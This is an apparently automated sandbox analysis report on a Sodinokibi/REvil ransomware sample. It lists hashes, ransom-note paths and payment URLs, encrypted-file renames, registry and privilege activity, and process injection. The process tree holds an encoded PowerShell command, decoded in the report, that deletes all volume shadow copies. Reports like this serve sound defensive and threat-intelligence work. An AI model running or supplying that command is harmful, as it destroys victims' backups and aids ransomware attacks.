Analysis
max time kernel: 149s
max time network: 152s
platform: windows10_x64
resource: win10
submitted: 20-08-2020 13:02

Static task: static1
Behavioral task: behavioral1
  Sample: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
  Resource: win10

General
Target: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
Size: 116KB
MD5: f9d060c4e1ef8bcda341ea2f490af006
SHA1: 549f4014aec9e52cd8a4a1b304561c00278063a3
SHA256: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499
SHA512: 57dacb3a98f429492381aaf2693ea4fc399d948c0a7dc6a9b3a45eed8474f3f0c8d84964834fd3f44f74b320d24a505b4255555f68c115ff553559493942fd87
Malware Config
Extracted
C:\iz7387-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD18DF36649D5926
http://decryptor.cc/FD18DF36649D5926
Signatures
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request 87 IoCs
Processes: rundll32.exe
flow pid process
flows 7, 10, 12, 14, 16, 18, 20, 22, 24, 26, 27, 28, 30, 32, 34, 36, 38, 41, 43, 45, 47, 49, 51, 53, 55, 57, 59, 61, 63, 65, 67, 69, 72, 74, 76, 78, 79, 81, 83, 85, 87, 89, 91, 94, 96, 98, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 130, 132, 134, 136
pid 2832, process rundll32.exe (identical for every flow listed above)
Modifies extensions of user files 15 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: rundll32.exe
description ioc process
File renamed C:\Users\Admin\Pictures\StopUnpublish.tif => \??\c:\users\admin\pictures\StopUnpublish.tif.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\WaitConvert.raw => \??\c:\users\admin\pictures\WaitConvert.raw.iz7387 rundll32.exe
File opened for modification \??\c:\users\admin\pictures\CompressSend.tiff rundll32.exe
File renamed C:\Users\Admin\Pictures\DenyLock.png => \??\c:\users\admin\pictures\DenyLock.png.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\EditSubmit.raw => \??\c:\users\admin\pictures\EditSubmit.raw.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\GrantPush.raw => \??\c:\users\admin\pictures\GrantPush.raw.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\CompressSend.tiff => \??\c:\users\admin\pictures\CompressSend.tiff.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\ResetResume.tif => \??\c:\users\admin\pictures\ResetResume.tif.iz7387 rundll32.exe
File opened for modification \??\c:\users\admin\pictures\UnlockSelect.tiff rundll32.exe
File renamed C:\Users\Admin\Pictures\TraceGroup.tif => \??\c:\users\admin\pictures\TraceGroup.tif.iz7387 rundll32.exe
File opened for modification \??\c:\users\admin\pictures\NewRevoke.tiff rundll32.exe
File renamed C:\Users\Admin\Pictures\UnlockSelect.tiff => \??\c:\users\admin\pictures\UnlockSelect.tiff.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\MountUnlock.tif => \??\c:\users\admin\pictures\MountUnlock.tif.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\NewRevoke.tiff => \??\c:\users\admin\pictures\NewRevoke.tiff.iz7387 rundll32.exe
File renamed C:\Users\Admin\Pictures\RemoveCompress.raw => \??\c:\users\admin\pictures\RemoveCompress.raw.iz7387 rundll32.exe
Enumerates connected drives 3 TTPs
Modifies service 2 TTPs 5 IoCs
Processes: vssvc.exe
description ioc process
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: rundll32.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\drjj9m6r.bmp" rundll32.exe
Drops file in Program Files directory 33 IoCs
Processes: rundll32.exe
description ioc process
File opened for modification \??\c:\program files\SwitchRevoke.pcx rundll32.exe
File opened for modification \??\c:\program files\RedoUnpublish.crw rundll32.exe
File opened for modification \??\c:\program files\SendUninstall.xhtml rundll32.exe
File opened for modification \??\c:\program files\SetConnect.rle rundll32.exe
File opened for modification \??\c:\program files\SplitUnblock.crw rundll32.exe
File opened for modification \??\c:\program files\UninstallConvert.M2V rundll32.exe
File opened for modification \??\c:\program files\UninstallPop.xltx rundll32.exe
File opened for modification \??\c:\program files\RegisterInstall.ps1xml rundll32.exe
File opened for modification \??\c:\program files\SearchBlock.vssm rundll32.exe
File opened for modification \??\c:\program files\ShowUnlock.jpg rundll32.exe
File opened for modification \??\c:\program files\NewLimit.vssx rundll32.exe
File opened for modification \??\c:\program files\SuspendGrant.jtx rundll32.exe
File opened for modification \??\c:\program files\GroupEdit.mp4v rundll32.exe
File opened for modification \??\c:\program files\RenameCompress.wvx rundll32.exe
File opened for modification \??\c:\program files\UnlockStart.rm rundll32.exe
File opened for modification \??\c:\program files\PingStep.emz rundll32.exe
File opened for modification \??\c:\program files\SearchOptimize.zip rundll32.exe
File opened for modification \??\c:\program files\AddFind.pdf rundll32.exe
File opened for modification \??\c:\program files\CompressDismount.bmp rundll32.exe
File opened for modification \??\c:\program files\DisablePush.xsl rundll32.exe
File opened for modification \??\c:\program files\SyncResume.ppt rundll32.exe
File opened for modification \??\c:\program files\OpenRequest.ex_ rundll32.exe
File opened for modification \??\c:\program files\RenameSearch.ini rundll32.exe
File opened for modification \??\c:\program files\RestoreBlock.dwg rundll32.exe
File opened for modification \??\c:\program files\DenyFormat.avi rundll32.exe
File opened for modification \??\c:\program files\LimitFormat.rtf rundll32.exe
File opened for modification \??\c:\program files\SplitRestart.nfo rundll32.exe
File opened for modification \??\c:\program files\EnterUninstall.dib rundll32.exe
File opened for modification \??\c:\program files\GetRedo.ppsm rundll32.exe
File opened for modification \??\c:\program files\NewUnprotect.dotx rundll32.exe
File created \??\c:\program files\iz7387-readme.txt rundll32.exe
File created \??\c:\program files (x86)\iz7387-readme.txt rundll32.exe
File opened for modification \??\c:\program files\ConnectComplete.odp rundll32.exe
Modifies system certificate store
Processes: rundll32.exe
description ioc process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 rundll32.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = [DER certificate blob for "AddTrust External CA Root", written four times, omitted] rundll32.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes: rundll32.exe, powershell.exe
pid process
2832 rundll32.exe
2832 rundll32.exe
3828 powershell.exe
3828 powershell.exe
3828 powershell.exe
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes: rundll32.exe, powershell.exe, vssvc.exe
description pid process
Token: SeDebugPrivilege 2832 rundll32.exe
Token: SeDebugPrivilege 3828 powershell.exe
Token: SeBackupPrivilege 852 vssvc.exe
Token: SeRestorePrivilege 852 vssvc.exe
Token: SeAuditPrivilege 852 vssvc.exe
Token: SeTakeOwnershipPrivilege 2832 rundll32.exe
Suspicious use of WriteProcessMemory 5 IoCs
Processes: rundll32.exe, rundll32.exe
description pid process target process
PID 4092 wrote to memory of 2832 4092 rundll32.exe rundll32.exe
PID 4092 wrote to memory of 2832 4092 rundll32.exe rundll32.exe
PID 4092 wrote to memory of 2832 4092 rundll32.exe rundll32.exe
PID 2832 wrote to memory of 3828 2832 rundll32.exe powershell.exe
PID 2832 wrote to memory of 3828 2832 rundll32.exe powershell.exe
Processes
C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#1
  - Suspicious use of WriteProcessMemory
  PID: 4092
  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#1
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2832
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all volume shadow copies, which is what the vssvc.exe activity below corresponds to)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3828
C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 3912
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 852